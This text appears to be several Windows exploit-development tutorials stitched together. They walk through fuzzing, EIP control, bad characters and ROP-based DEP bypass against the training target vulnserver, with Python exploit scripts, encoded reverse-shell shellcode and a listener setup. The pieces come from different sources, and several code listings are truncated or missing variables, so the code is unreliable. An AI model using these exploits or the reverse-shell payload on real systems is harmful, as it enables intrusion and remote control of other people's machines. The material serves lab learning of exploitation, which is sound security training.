Let’s take a look at some of them:
There are some flags we can already see will be of great use to us. Mainly, the “-cp” and “-m”
arguments. We can use “-cp nonull” to look through modules that don’t contain nullbytes in
their address spaces, and the “-m " argument to specify all modules, or specific ones. Let's
generate a rop chain with the following command:
This command will search through all loaded modules, and build a chain of ROP gadgets for us
to bypass DEP with. This will take a long time to finish, so grab a cup of coffee.
Once it’s finished, let’s take a quick look at the ROP chain created, and take a deeper look at
what’s going on.
To the layman, this is a lot of information to take in. Even for me, having already gone through
the SLAE course by Pentester Academy, there are some confusing operations going on. Let’s
take a look at the MSDN for VirtualAlloc and get a better understanding of how it relates to
DEP.
Reserves, commits, or changes the state of a region of pages in the virtual address space of the
calling process. Memory allocated by this function is automatically initialized to zero.
LPVOID VirtualAlloc(
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flAllocationType,
DWORD flProtect
);
Source: MSDN
Examining VirtualProtect (another commonly abused function to bypass DEP), we can see
there are some similarities in capabilities between these two functions:
Changes the protection on a region of committed pages in the virtual address space of the
calling process.
BOOL VirtualProtect(
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flNewProtect,
PDWORD lpflOldProtect
);
Source: MSDN
First in the sequence of our ROP chain above, it acquires the location of VirtualAlloc() from the
Import Address Table of sechost.dll, and then returns. Remember, every gadget within the
ROP chain needs to specify a retn opcode to return control back to the subsequent gadgets in
the chain. After some crafty calculations for arguments, the chain then assigns those
arguments for VirtualAlloc, and calls with the following heuristics:
This is a very quick summary, and like I said, there are parts of this ROP chain that confuse me,
so I may have messed up my analysis of it.
#!/usr/bin/env python
"""
Date: 12/18/2019
"""
import socket
import struct
import sys
host = sys.argv[1]
port = int(sys.argv[2])
def create_rop_chain():
rop_gadgets = [
0x90909090, # nop
def main():
rop_chain = create_rop_chain()
buffer += "A"*2003
buffer += rop_chain
buffer += "\xCC"*(3500-2003-len(rop_chain))
try:
s.connect((host, port))
s.recv(1024)
s.send(buffer)
s.close()
print msg
main()
Wow! We did it! We bypassed DEP on Windows 10! All we need to do now is add a NOP sled
for some safety, change our interrupts back to C’s, implement some shellcode, and adjust for
the new payload lengths. We’ll skip the badchar enumeration and assume “\x00” is the only
bad character (although, we should have done this much earlier in the process!).
#!/usr/bin/env python
"""
Date: 12/18/2019
"""
import socket
import struct
import sys
host = sys.argv[1]
port = int(sys.argv[2])
shellcode = b""
shellcode += b"\xba\x80\x08\x48\x4a\xd9\xc6\xd9\x74\x24\xf4\x5d\x33"
shellcode += b"\xc9\xb1\x52\x31\x55\x12\x83\xc5\x04\x03\xd5\x06\xaa"
shellcode += b"\xbf\x29\xfe\xa8\x40\xd1\xff\xcc\xc9\x34\xce\xcc\xae"
shellcode += b"\x3d\x61\xfd\xa5\x13\x8e\x76\xeb\x87\x05\xfa\x24\xa8"
shellcode += b"\xae\xb1\x12\x87\x2f\xe9\x67\x86\xb3\xf0\xbb\x68\x8d"
shellcode += b"\x3a\xce\x69\xca\x27\x23\x3b\x83\x2c\x96\xab\xa0\x79"
shellcode += b"\x2b\x40\xfa\x6c\x2b\xb5\x4b\x8e\x1a\x68\xc7\xc9\xbc"
shellcode += b"\x8b\x04\x62\xf5\x93\x49\x4f\x4f\x28\xb9\x3b\x4e\xf8"
shellcode += b"\xf3\xc4\xfd\xc5\x3b\x37\xff\x02\xfb\xa8\x8a\x7a\xff"
shellcode += b"\x55\x8d\xb9\x7d\x82\x18\x59\x25\x41\xba\x85\xd7\x86"
shellcode += b"\x5d\x4e\xdb\x63\x29\x08\xf8\x72\xfe\x23\x04\xfe\x01"
shellcode += b"\xe3\x8c\x44\x26\x27\xd4\x1f\x47\x7e\xb0\xce\x78\x60"
shellcode += b"\x1b\xae\xdc\xeb\xb6\xbb\x6c\xb6\xde\x08\x5d\x48\x1f"
shellcode += b"\x07\xd6\x3b\x2d\x88\x4c\xd3\x1d\x41\x4b\x24\x61\x78"
shellcode += b"\x2b\xba\x9c\x83\x4c\x93\x5a\xd7\x1c\x8b\x4b\x58\xf7"
shellcode += b"\x4b\x73\x8d\x58\x1b\xdb\x7e\x19\xcb\x9b\x2e\xf1\x01"
shellcode += b"\x14\x10\xe1\x2a\xfe\x39\x88\xd1\x69\x4c\x47\xd3\x79"
shellcode += b"\x38\x55\xe3\x68\xe4\xd0\x05\xe0\x04\xb5\x9e\x9d\xbd"
shellcode += b"\x9c\x54\x3f\x41\x0b\x11\x7f\xc9\xb8\xe6\xce\x3a\xb4"
shellcode += b"\xf4\xa7\xca\x83\xa6\x6e\xd4\x39\xce\xed\x47\xa6\x0e"
shellcode += b"\x7b\x74\x71\x59\x2c\x4a\x88\x0f\xc0\xf5\x22\x2d\x19"
shellcode += b"\x63\x0c\xf5\xc6\x50\x93\xf4\x8b\xed\xb7\xe6\x55\xed"
shellcode += b"\xf3\x52\x0a\xb8\xad\x0c\xec\x12\x1c\xe6\xa6\xc9\xf6"
shellcode += b"\x6e\x3e\x22\xc9\xe8\x3f\x6f\xbf\x14\xf1\xc6\x86\x2b"
shellcode += b"\x3e\x8f\x0e\x54\x22\x2f\xf0\x8f\xe6\x5f\xbb\x8d\x4f"
shellcode += b"\xc8\x62\x44\xd2\x95\x94\xb3\x11\xa0\x16\x31\xea\x57"
shellcode += b"\x06\x30\xef\x1c\x80\xa9\x9d\x0d\x65\xcd\x32\x2d\xac"
def create_rop_chain():
rop_gadgets = [
0x90909090, # nop
def main():
rop_chain = create_rop_chain()
nop_sled = "\x90"*8
buffer += "A"*2003
buffer += rop_chain
buffer += nop_sled
buffer += shellcode
buffer += "C"*(3500-2003-len(rop_chain)-len(nop_sled)-len(shellcode))
try:
s.connect((host, port))
s.recv(1024)
s.send(buffer)
s.close()
print msg
main()
Let’s restart the application outside of the debugger, and run the exploit to see if we catch a
shell:
Outstanding! We caught the shell! This was a really fun exercise, and I learned a lot in the
process. Unfortunately, there is one very MAJOR hiccup to this exploit…and that roadblock
is…ASLR. There may be an avenue to make a 100% reliable and working exploit for this that
can survive reboots, but with my current level of knowledge I don’t know if it’s possible. If it is,
I don’t know how I might approach it. You can try for yourself to understand what I mean. Try
rebooting your virtual machine, and rerunning your exploit as-is. Does it work? Why doesn’t it
work?
** REBASED ** ASLR
All kernel modules’ base addresses will change, and their memory regions will be randomized
upon every reboot. There are some options to potentially defeat ASLR:
2. Build a rop chain from a binary or library that isn’t rebased or compiled with ASLR.
4. Search other static memory regions for opcodes to build rop chains from
https://cwinfosec.org/Intro-ROP-DEP-Bypass/
We have kernel at the top and text at the bottom. When we think of the kernel, we can think
of it as the command line. The stack is used by the processes for the storage of automatic
identifiers, register variables and information about function calls. The text segment is a
section of a program in the memory and it holds executable instructions. The heap is a
segment of memory where dynamic memory allocation takes place.
Spiking
The first step is to disable your Windows defender real-time protection as shown below. This is
because vulnserver will be blocked by Windows defender when we run anything malicious
against it.
What spiking does Is that we take each of the commands one at a time and try to overflow the
buffer. If it crashes then we can know that that command is vulnerable. To do this, we first run
vulnserver as an administrator, and then we run immunity debug also as administrator and we
attach the vulnserver to it. We then run the following command on our Kali Linux machine:
We test each of these commands for if they are vulnerable. This process is called spiking. We
write a python script as shown.
We send the variable in all different forms and iterations and try to break the program. We run
this script as follows:
We should perform the above for all the commands. When we run the TRUN command, I
notice that there is Access Violation and immunity stops running and the vulnserver has
crashed and so we know that TRUN is vulnerable.
Fuzzing is similar to spiking as I will be trying to send a bunch of characters and I will try to
break it. I first attach vulnserver with immunity Debugger and I then run the following script to
fuzz. Fuzzing allows us to identify if a command is vulnerable and how many bytes it takes
approximately for an overflow.
When this command is run, the server crashes and when I kill the command running on my Kali
Linux machine, it shows me the exact byte where the program crashed as shown below:
We crashed at around 3000 bytes as we take a round figure. The next step is to find the offset.
Finding the Extended Instruction Pointer (EIP) in buffer overflows. This allows us to point to a
malicious shellcode later on. I then look for where we overwrite the EIP and to do this, I use an
inbuilt tool in Kali Linux called Pattern create as shown below:
I then attach vulnserver to immunity debugger again and run the script and get the following
result:
Vulnserver crashes and it overwrites everything. I am interested in the value of EIP. I then use
the value of EIP to get a pattern offset using the following command:
The information retrieved is important because it tells us that at 2003 bytes we can control the
EIP. The next step is to overwrite the EIP.
In this step I use a script to control and overwrite the EIP in buffer overflows and thus allowing
me to execute malicious code.
I again attach vulnserver to immunity and then run the code and I get the following result:
If you notice the EIP is 42424242. I only sent 4 bytes of Bs and they all landed on EIP and thus
this means we control the EIP now. The next step is to find bad characters.
A bad character is simply a list of unwanted characters that can break the shellcodes. We thus
have to identify these bad characters and omit them otherwise we will not be able to get a
shell.
I run the following script again on vulnserver which has been attached to immunity.
Vulnserver crashes and to run the eye test on the bad characters, I right-click on ESP and click
on follow in the dump. This takes me to the left screen where I can see all the bad characters. I
run an eye test to check whether any of the bad characters have been overwritten. “\x00” is
always a bad character and thus I have omitted it from the script from the beginning.
The next step is to find the right module.
So, now I replaced our four B’s with our return address. The return address is entered in a
Little Endian Format and thus it is written in reverse. We have to use the Little Endian format
in x86 architecture because the low-order byte is stored in the memory at the lowest address
and the high-order byte is stored at the highest address. Thus, we enter our return address
backward.
Now, I need to test out our return address. Again, with a freshly attached Vulnserver, we need
to find our return address in Immunity Debugger. To do this, I click on the far-right arrow on
the top panel of Immunity as shown:
Then search for “625011AF” (or the return address you found), without the quotes, in the
“Enter expression to follow” prompt. That should bring up the return address, FFE4, JMP ESP
location. I then hit F2 and the address should turn blue which shows that we have set the
breakpoint.
I then execute my code and see whether it triggers the breakpoint. If it triggers in the
immunity debugger, that means I can now develop the exploit.
To generate the shell code I create a payload and put the payload in the python script as
follows:
-p is for payload. We are using non-staged windows reverse shell payload.
LHOST is the ATTACKER’S IP address.
LPORT is the ATTACKER’S port of choice. Here I am using 4444.
EXITFUNC=thread adds stability to our payload.
-f is for the file type. We are going to generate a C file type here.
-a is for architecture. The machine we are attacking is x86.
–platform is for OS type. We are attacking a Windows machine.
-b is for bad characters. Remember, the only bad character we have is the null byte, x00.
I then set up a Netcat listener to receive the connection.
I then run vulnserver only and execute the following code and I get a shell
I could get this shell because Data Execution Prevention (DEP) was turned off. However
Windows machines have DEP protection mechanism enabled and thus if I run the script when
this protection mechanism is turned on, then we cannot get a shell.
However, a method has been researched where I can get a shell despite the DEP protection
mechanism is turned on. I shall discuss this next. The image below shows DEP protection which
is turned ON by default on Windows Machines.
!mone rop -m *.dll -n -cpb “\x00”
This command creates a Return Oriented Programming chain.
-m specifies the module which mona will search through
-n means that we want the chain to be saved to a file.
-cpb means that we need to specify the criteria with bad characters by pointing to it.
In order to get a shell despite the DEP protection mechanism being on, I run the above
command in the search bar of immunity debugger. This generates a Return Oriented
Programming Chain (ROP) and saves it in a file. The file is saved in the Program Files of
Immunity debugger. It is called rop_chain.txt. I then transfer the file to the Kali Linux machine.
I open the file in my Kali Linux machine and copy the python code from the Register setup for
VirtualProtect() into another python file. I also create another payload as shown above, and
the complete code looks as follows:
I set up my listener and run vulnserver and run the code and get a shell.
https://medium.com/cybersecurityservices/dep-bypass-using-rop-chains-garima-chopra-
e8b3361e50ce
https://medium.com/4ndr3w/linux-x86-bypass-dep-nx-and-aslr-with-return-oriented-
programming-ef4768363c9a
https://tcm-sec.com/buffer-overflows-made-easy/
https://macrosec.tech/index.php/2020/11/10/dep-bypass-using-rop-chains/
Overwriting EIP
Boofuzz
Next we will need to install boofuzz on our attacker box. If you are on a Debian-based Linux
machine, you can run the following commands (if you do not have pip installed, first run apt-
get install python-pip):
2. cd boofuzz
3. pip install .
You can read more about boofuzz installation and documentation here.
To:
Vulnserver
Now we need our badly written application. I downloaded and used the .zip hosted here from
my Windows 7 VM, but feel free to download directly from the author here.
The .exe will run as long as its companion essfunc.dll file is in the same location. I moved both
to my desktop for ease of use in the Windows 7 VM.
Immunity Debugger
Next we will download our debugger which we will use to investigate how vulnserver is
behaving under different circumstances. Access the download link from your Windows 7 VM,
and fill out the requisite information (I believe dummy data will suffice.) Once you start the
installer, it will notice that you do not have Python installed and offer to install it for you.
Mona
Mona is a very robust Python tool that can be used inside Immunity to perform a broad range
of analysis for us. To install Mona, I just visited the Corelan Mona repo and copied the raw text
to a txt document inside my Windows 7 VM and saved it as mona.py.
Exploring Vulnserver
The first thing we want to do is run vulnserver.exe and then interact with the application as a
normal client to determine how the application works under normal circumstances. We don’t
need to run the process in Immunity just yet. Start the application and you should recieve the
following Windows prompt:
Next, we want to interact with the listening service from our attacker and determine how the
application is supposed to work. We can use netcat for this and we’ll just make a simple TCP
connection to the target with the following command:
Immediately we see that the connection is made and that the server is offering us
the HELP command to show us valid commands for the service. Once we send
the HELP command we get the following output:
Using Boofuzz
Working off of a very detailed and helpful working aid from zeroaptitude.com, we learn that
the first element of any boofuzz fuzzing script is the ‘session.’ (For this excercise I worked
directly out of the boofuzz directory.)
The purpose of the session is to establish a named entity which details: the host we want to
connect to, the port we want to connect to, and the parameters we want to fuzz.
#!/usr/bin/python
def main():
if __name__ == "__main__":
main()
This skeleton, once it includes a ‘session’, will be our template for all of our subsequent fuzzing
scripts. The session will be defined in the main() function and will establish a variable
named session which will comprise a few global variables, namely: host and port for this
excercise. Let’s see our code below:
#!/usr/bin/python
def main():
session = Session(target = Target(connection = SocketConnection(host, port,
proto='tcp')))
s_delim(" ", fuzzable = False) #we don't want to fuzz the space between
"TRUN" and our arg
if __name__ == "__main__":
main()
Excellent, we have the first crucial piece to our boofuzz puzzle. Now we just need to add a
couple lines to join our session with our actual fuzzing functions, we can accomplish this by
appending the following two lines to our code:
#!/usr/bin/python
def main():
s_delim(" ", fuzzable = False) #we don't want to fuzz the space between
"TRUN" and our arg
if __name__ == "__main__":
main()
Since we want to determine how the application reacts to our fuzzing script, we need to start
the vulnserver.exe in Immunity. This is easily accomplished by dragging the vulnserver.exe icon
on the desktop to the Immunity icon which will automatically open Immunity with
the vulnserver.exe process attached. If you have never used Immunity before, do not worry,
there are a ton of great guides online and I will be linking themn in the resources section.
One thing to know is that when you attach a process to Immunity in the way we just described,
the process is not actually running yet. We need to press the small red ‘play’ triangle to start
the process as if we just double-clicked it on the desktop. Immunity even gives us a terminal
prompt as if we were running vulnserver on it’s own.
If you notice, in the bottom right hand side of Immunity, there is a yellow and red
message Paused indicating that the process is not running. After pressing the play symbol
(alternatively, you can use the F9 key to start the process), we need to run our python script
from our attacker to begin fuzzing the application.
If we see at any point that Immunity gives us an Access Violation error message at the bottom,
we know that the program has crashed due to our fuzzing and we can stop our fuzzer script on
our attacker.
We see pretty quickly that our fuzzer has crashed the application. After stopping our script, we
examine the Registers (FPU) pane in Immunity and see that several locations now hold
references to our payload of 41 which is the hexidecimal representation of a capital A. This
means that whenever we send our payload, it is written into these locations in memory on the
victim. We notice that EAX, ESP, EBP, and EIP all contain references to our long string
of A with EAX also sporting a preprended TRUN /.:/ string.
Essentially what we have discovered at this point is that, we are able to subvert the expected
application input in a way that allows to take control of the value of EIP. EIP’s job is to contain
the address in memory of the next instruction to be executed. So if we can tell the process
where to go, we can tell it what to execute. If we can tell it what to execute, there is a chance
we can get it to execute a malicious payload.
Well, we know at this point that we can affect the value of EIP, but what we don’t know, is
how far into our payload of A the EIP overwrite occurred. We don’t even know how many
bytes of data we sent to the application at this point, we kind of just hit a giant Fuzz Button
and watched our application crash.
Boofuzz Results
Luckily, boofuzz stores some useful information for us in a SQLite type db file in the boofuzz-
results directory after each session. Once you open the .db file, click on the Browse Data tab
and change the Table drop down option from cases to steps. Opening the relevant session in
the gui as described shows us the following:
In entry 15, we see our familiar string TRUN /.: and the entry above it, 14, states
that boofuzz sent 5011 bytes:
What we’ll do now is, create our exploit skeleton in python and test to see if sending 5011
bytes worth of A results in us getting the same 41414141 value overwritten to EIP.
exploitSkeleton.py
We can craft up a skeleton exploit that we can stash away for later use and edit copies of as
we need them throughout this series. Our exploit skeleton will be the following:
#!/usr/bin/python
import socket
import os
import sys
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
print s.recv(1024)
s.send(buffer)
print s.recv(1024)
s.close()
Let’s edit this code to match our exact situation by changing the host, port,
and buffer variables. Let’s also keep in mind that the fuzzer prepended our fuzz-string
with TRUN /.:/ so it’s not just as simple as multiplying A by 5011. We have to prepend
our TRUN argument as well. Our final payload should look something like this:
#!/usr/bin/python
import socket
import os
import sys
host = "192.168.1.201"
port = 9999
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
print s.recv(1024)
print s.recv(1024)
s.close()
Running this python script with vulnserver attached in Immunity nets us the same Registers
(FPU) panel, excellent. So we know for certain that we can overwrite EIP. The next step is to
determine how far into our string of 5011 A the overwrite occurs.
To determine this, we can leverage Mona’s ability to create a “cyclical” string of data which
never repeats any patterns. This string of data will overwrite EIP and provide us with an exact
location of where in our string the overwrite occurred since we’ll have a reference point to a
unique set of 4 hex characters.
To make Mona create our string, we use the following command in the white bar at the
bottom of the Immunity GUI: !mona pc 5011 (‘pc’ is short for ‘pattern-create’ and there are
multiple scripts and tools out there that will perform this for you, including Metasploit. I prefer
using Mona since I’m already in Immunity.
Mona outputs this string (use the ASCII one) to a file called pattern.txt which is located in
the C:\Program Files\Immunity Inc\Immunity Debugger directory. Make sure you copy the
string from this file and not the pane in Immunity as the string in the pane might be truncated
(especially at 5000 bytes). This string now becomes our buffer and we feed it back to a
restarted vulnserver process in Immunity.
#!/usr/bin/python
import socket
import os
import sys
host = "192.168.1.201"
port = 9999
buffer =
"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3
Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7A
e8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3
Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak
1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5A
m6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8A
o9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar
3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9
Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw
3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay
7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2
Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7
Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3
Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj
0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl
8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0B
o1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq
5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1B
t2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7
Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1
By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7
Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2C
d3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8C
f9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4C
i5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3
Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7
Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq
2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8
Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4
Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8
Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da
4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc
8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df
2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6D
h7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3D
k4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7D
m8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0D
p1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4
Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du
0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3
Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6D
y7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2
Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8
Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5
Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3
Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1E
m2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5
Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0E
r1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et
9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew
4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9E
z0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6
Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe
3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0F
h1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0
Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm
7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2
Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9
Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7
Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2F
x3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga
0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3G
c4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7
